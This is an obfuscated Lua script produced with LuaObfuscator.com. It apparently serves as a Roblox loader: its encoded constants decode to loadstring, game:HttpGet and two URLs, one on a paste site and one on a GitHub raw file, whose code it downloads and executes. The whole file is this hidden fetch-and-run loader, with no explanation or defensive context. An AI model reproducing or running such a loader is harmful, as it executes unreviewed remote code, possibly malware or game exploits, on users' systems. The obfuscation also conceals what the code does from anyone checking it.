--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v83=v2(v0(v30,16));if v19 then local v90=v5(v83,v19);v19=nil;return v90;else return v83;end end end);local function v20(v31,v32,v33) if v33 then local v84=(v31/(2^(v32-(2 -1))))%(2^(((v33-(2 -1)) -(v32-(1 -0))) + (2 -1))) ;return v84-(v84%(620 -(555 + (1334 -(226 + 1044))))) ;else local v85=(2 + 0)^(v32-(1 -0)) ;return (((v31%(v85 + v85))>=v85) and (932 -(857 + 74))) or (568 -(367 + (875 -674))) ;end end local function v21() local v34=117 -(32 + 85) ;local v35;while true do if (v34==(1 + (0 -0))) then return v35;end if (v34==0) then v35=v1(v16,v18,v18);v18=v18 + 1 + 0 ;v34=958 -(892 + 65) ;end end end local function v22() local v36,v37=v1(v16,v18,v18 + (3 -1) );v18=v18 + 2 ;return (v37 * (469 -213)) + v36 ;end local function v23() local v38=350 -(87 + 263) ;local v39;local v40;local v41;local v42;while true do if (v38==((1133 -(802 + 150)) -(67 + 113))) then return (v42 * (12302277 + 4474939)) + (v41 * ((433199 -272298) -95365)) + (v40 * (189 + 67)) + v39 ;end if (v38==0) then v39,v40,v41,v42=v1(v16,v18,v18 + 3 );v18=v18 + (15 -11) ;v38=1;end end end local function v24() local v43=v23();local v44=v23();local v45=(1139 -(116 + 1022)) -0 ;local v46=(v20(v44,1 + 0 ,1017 -(915 + 82) ) * ((5 -3)^(19 + 13))) + v43 ;local v47=v20(v44,27 -(24 -18) ,(2704 -(998 + 488)) -(1069 + 118) );local v48=((v20(v44,72 -40 )==(1 -0)) and  -1) or (1 + 0) ;if (v47==(0 -0)) then if (v46==(0 + 0)) then return v48 * (791 -(368 + (1544 -1121))) ;else local v91=(0 + 0) -0 ;while true do if (((15 + 3) -(10 + 8))==v91) then v47=3 -2 ;v45=442 -(416 + (92 -66)) ;break;end end end elseif (v47==(6535 -4488)) then return ((v46==(0 + 0)) and (v48 * ((1 -(772 -(201 + 571)))/(438 -(145 + 293))))) or (v48 * NaN) ;end return v8(v48,v47-1023 ) * (v45 + (v46/(2^((1341 -(814 + 45)) -(44 + 386))))) ;end local function v25(v49) local v50;if  not v49 then local v86=(0 -0) -0 ;while true do if ((0 + 0)==v86) then v49=v23();if (v49==0) then return "";end break;end end end v50=v3(v16,v18,(v18 + v49) -(1 + 0) );v18=v18 + v49 ;local v51={};for v66=886 -(261 + 624) , #v50 do v51[v66]=v2(v1(v3(v50,v66,v66)));end return v6(v51);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return 0;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();while true do local v68=(function() return 0;end)();while true do if (v68==(1 + 0)) then if (v52~=0) then else local v96=(function() return 0 -0 ;end)();while true do if ((0 -0)==v96) then v53=(function() return function(v157,v158,v159) local v160=(function() return 0 -0 ;end)();local v161=(function() return;end)();while true do if (v160~=(0 -0)) then else v161=(function() return 285 -(134 + 151) ;end)();while true do if (v161==(1665 -(970 + 695))) then local v182=(function() return 0;end)();while true do if (v182==(0 -0)) then v157[v158-#"!" ]=(function() return v159();end)();return v157,v158,v159;end end end end break;end end end;end)();v54=(function() return {};end)();v96=(function() return 1;end)();end if (v96~=1) then else v55=(function() return {};end)();v52=(function() return 1991 -(582 + 1408) ;end)();break;end end end if (1==v52) then local v97=(function() return 0 -0 ;end)();local v98=(function() return;end)();while true do if (v97~=0) then else v98=(function() return 0;end)();while true do if (v98~=0) then else v56=(function() return {};end)();v57=(function() return {v54,v55,nil,v56};end)();v98=(function() return 3 -2 ;end)();end if (v98==(1825 -(1195 + 629))) then v58=(function() return v23();end)();v52=(function() return 2;end)();break;end end break;end end end break;end if (v68~=(0 -0)) then else if (v52==(243 -(187 + 54))) then v59=(function() return {};end)();for v100= #"[",v58 do local v101=(function() return 780 -(162 + 618) ;end)();local v102=(function() return;end)();local v103=(function() return;end)();local v104=(function() return;end)();while true do if (v101~=1) then else v104=(function() return nil;end)();while true do if ((1 + 0)==v102) then if (v103== #",") then v104=(function() return v21()~=(0 + 0) ;end)();elseif (v103==2) then v104=(function() return v24();end)();elseif (v103== #"91(") then v104=(function() return v25();end)();end v59[v100]=(function() return v104;end)();break;end if (v102==0) then local v170=(function() return 0 -0 ;end)();local v171=(function() return;end)();while true do if (v170~=0) then else v171=(function() return 0;end)();while true do if (v171==1) then v102=(function() return 1 -0 ;end)();break;end if (v171==(0 + 0)) then v103=(function() return v21();end)();v104=(function() return nil;end)();v171=(function() return 1;end)();end end break;end end end end break;end if (v101~=0) then else v102=(function() return 1636 -(1373 + 263) ;end)();v103=(function() return nil;end)();v101=(function() return 1001 -(451 + 549) ;end)();end end end v57[ #"19("]=(function() return v21();end)();v52=(function() return 1 + 2 ;end)();end if (3==v52) then for v105= #"<",v23() do local v106=(function() return v21();end)();if (v20(v106, #">", #"}")==0) then local v135=(function() return 0 -0 ;end)();local v136=(function() return;end)();local v137=(function() return;end)();local v138=(function() return;end)();local v139=(function() return;end)();while true do if (v135~=0) then else local v166=(function() return 0 -0 ;end)();local v167=(function() return;end)();while true do if (v166~=(1384 -(746 + 638))) then else v167=(function() return 0;end)();while true do if ((1 + 0)==v167) then v135=(function() return 1;end)();break;end if (v167~=(0 -0)) then else v136=(function() return 0;end)();v137=(function() return nil;end)();v167=(function() return 342 -(218 + 123) ;end)();end end break;end end end if (v135==(1583 -(1535 + 46))) then while true do if ((2 + 0)==v136) then local v176=(function() return 0 + 0 ;end)();local v177=(function() return;end)();while true do if (0==v176) then v177=(function() return 560 -(306 + 254) ;end)();while true do if (v177==(1 + 0)) then v136=(function() return  #"19(";end)();break;end if (v177~=(0 -0)) then else if (v20(v138, #"}", #"{")== #"}") then v139[1469 -(899 + 568) ]=(function() return v59[v139[2 + 0 ]];end)();end if (v20(v138,2,4 -2 )~= #",") then else v139[ #"xnx"]=(function() return v59[v139[ #"19("]];end)();end v177=(function() return 604 -(268 + 335) ;end)();end end break;end end end if (v136~= #",") then else local v178=(function() return 0;end)();local v179=(function() return;end)();while true do if ((290 -(60 + 230))~=v178) then else v179=(function() return 572 -(426 + 146) ;end)();while true do if (v179==(0 + 0)) then v139=(function() return {v22(),v22(),nil,nil};end)();if (v137==0) then local v187=(function() return 0;end)();local v188=(function() return;end)();while true do if (v187==0) then v188=(function() return 0;end)();while true do if (v188==(811 -(569 + 242))) then v139[ #"xxx"]=(function() return v22();end)();v139[ #".com"]=(function() return v22();end)();break;end end break;end end elseif (v137== #"|") then v139[ #"-19"]=(function() return v23();end)();elseif (v137==(5 -3)) then v139[ #"gha"]=(function() return v23() -(2^(1 + 15)) ;end)();elseif (v137== #"xxx") then local v193=(function() return 0;end)();local v194=(function() return;end)();while true do if (v193~=(1024 -(706 + 318))) then else v194=(function() return 1251 -(721 + 530) ;end)();while true do if (v194~=(1271 -(945 + 326))) then else v139[ #"-19"]=(function() return v23() -(2^(39 -23)) ;end)();v139[ #"?id="]=(function() return v22();end)();break;end end break;end end end v179=(function() return 1;end)();end if (1==v179) then v136=(function() return 2 + 0 ;end)();break;end end break;end end end if (v136== #"91(") then if (v20(v138, #"-19", #"91(")== #"<") then v139[ #"?id="]=(function() return v59[v139[ #"asd1"]];end)();end v54[v105]=(function() return v139;end)();break;end if (v136==0) then local v181=(function() return 700 -(271 + 429) ;end)();while true do if (v181==(0 + 0)) then v137=(function() return v20(v106,1502 -(1408 + 92) , #"-19");end)();v138=(function() return v20(v106, #"http",6);end)();v181=(function() return 1087 -(461 + 625) ;end)();end if ((1289 -(993 + 295))~=v181) then else v136=(function() return  #"[";end)();break;end end end end break;end if (v135~=1) then else v138=(function() return nil;end)();v139=(function() return nil;end)();v135=(function() return 1 + 1 ;end)();end end end end for v107= #"<",v23() do v55,v107,v28=(function() return v53(v55,v107,v28);end)();end return v57;end v68=(function() return 1172 -(418 + 753) ;end)();end end end end local function v29(v60,v61,v62) local v63=v60[2 -1 ];local v64=v60[2];local v65=v60[(5 -3) + 1 ];return function(...) local v69=v63;local v70=v64;local v71=v65;local v72=v27;local v73=1;local v74= -(1 + 0);local v75={};local v76={...};local v77=v12("#",...) -(1 + 0) ;local v78={};local v79={};for v87=0 + 0 ,v77 do if ((v87>=v71) or (788>2514)) then v75[v87-v71 ]=v76[v87 + 1 ];else v79[v87]=v76[v87 + (1 -0) ];end end local v80=(v77-v71) + (530 -(406 + 123)) ;local v81;local v82;while true do v81=v69[v73];v82=v81[1770 -(1749 + 20) ];if (v82<=(2 + 3)) then if ((v82<=(1324 -(1249 + 73))) or (55==2387)) then if ((1454<2491) and (v82<=((336 -(144 + 192)) + 0))) then local v108;local v109,v110;local v111;local v112;v79[v81[1147 -(466 + 679) ]]=v62[v81[(222 -(42 + 174)) -(3 + 0) ]];v73=v73 + (2 -1) ;v81=v69[v73];v112=v81[1902 -(106 + 1794) ];v111=v79[v81[1 + 2 ]];v79[v112 + 1 ]=v111;v79[v112]=v111[v81[2 + 2 ]];v73=v73 + (2 -1) ;v81=v69[v73];v79[v81[2]]=v81[7 -4 ];v73=v73 + (115 -((8 -4) + 92 + 18)) ;v81=v69[v73];v79[v81[2]]=v81[587 -(17 + 40 + 527) ]~=(1427 -(18 + 23 + 1386)) ;v73=v73 + (104 -((82 -65) + 86)) ;v81=v69[v73];v112=v81[2];v109,v110=v72(v79[v112](v13(v79,v112 + 1 + 0 ,v81[(759 -(239 + 514)) -(2 + 1) ])));v74=(v110 + v112) -(2 -1) ;v108=166 -(122 + 44) ;for v140=v112,v74 do v108=v108 + (1 -0) ;v79[v140]=v109[v108];end v73=v73 + (3 -(1506 -(363 + 1141))) ;v81=v69[v73];v112=v81[2 + 0 ];v79[v112]=v79[v112](v13(v79,v112 + (1330 -(797 + 532)) ,v74));v73=v73 + 1 + 0 ;v81=v69[v73];v79[v81[3 -(1 + 0) ]]();v73=v73 + ((200 -134) -(30 + 35)) ;v81=v69[v73];v79[v81[2 + 0 + 0 ]]=v62[v81[1260 -(1043 + 73 + 141) ]];v73=v73 + (3 -2) ;v81=v69[v73];v79[v81[1214 -(323 + 889) ]]=v62[v81[(6 + 1) -4 ]];v73=v73 + ((1365 -784) -((2336 -(1913 + 62)) + 138 + 81)) ;v81=v69[v73];v112=v81[322 -(53 + 267) ];v111=v79[v81[1 + 2 ]];v79[v112 + (414 -(15 + 398)) ]=v111;v79[v112]=v111[v81[4]];elseif (v82==(983 -(18 + 964))) then v79[v81[(1209 -(373 + 829)) -(736 -(476 + 255)) ]]=v62[v81[2 + 1 ]];else local v145=0;local v146;while true do if ((v145==(0 + 0)) or (4157<=2803)) then v146=v81[(1982 -(369 + 761)) -(20 + 830) ];v79[v146]=v79[v146](v13(v79,v146 + (3 -2) + 0 ,v74));break;end end end elseif (v82<=3) then v79[v81[128 -(116 + 10) ]]=v81[3];elseif (v82>4) then v73=v81[3];else do return;end end elseif ((4853>=2982) and (v82<=(1 + 7))) then if ((4134>3357) and (v82<=(744 -(542 + 196)))) then v79[v81[3 -1 ]]();elseif (v82==(3 + 4)) then local v148=v81[2];local v149=v79[v81[2 + 0 + 1 ]];v79[v148 + 1 + (1661 -(1477 + 184)) ]=v149;v79[v148]=v149[v81[10 -6 ]];else for v162=v81[4 -2 ],v81[1554 -(1126 + 425) ] do v79[v162]=nil;end end elseif ((v82<=(414 -(118 + 287))) or (3417<2534)) then v79[v81[7 -(6 -1) ]]=v81[3]~=0 ;elseif (v82>10) then if (v79[v81[2]]==v81[1125 -(118 + 1003) ]) then v73=v73 + (2 -(1 + 0)) ;else v73=v81[(1236 -(564 + 292)) -(142 + (426 -191)) ];end else local v153=v81[9 -7 ];local v154,v155=v72(v79[v153](v13(v79,v153 + 1 + (0 -0) ,v81[980 -(553 + 424) ])));v74=(v155 + v153) -(1 -0) ;local v156=0 + 0 ;for v164=v153,v74 do local v165=0 + 0 ;while true do if (v165==(0 + 0)) then v156=v156 + 1 + 0 ;v79[v164]=v154[v156];break;end end end end v73=v73 + (239 -(64 + 174)) + 0 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!063Q00028Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403283Q00682Q7470733A2Q2F63646E2E736F75726365622E696E2F62696E732F5751365A324F702Q33312F3003453Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F4E656D657369732D6C61672F652Q672F726566732F68656164732F6D61696E2F652Q67001B3Q0012033Q00014Q0008000100013Q00260B3Q0002000100010004053Q00020001001203000100013Q00260B00010005000100010004053Q00050001001201000200023Q00122Q000300033Q00202Q00030003000400122Q000500056Q000600016Q000300066Q00023Q00024Q00020001000100122Q000200023Q00122Q000300033Q00202Q000300030004001203000500064Q000A000300054Q000200023Q00022Q00060002000100010004053Q001A00010004053Q000500010004053Q001A00010004053Q000200012Q00043Q00017Q00",v9(),...);
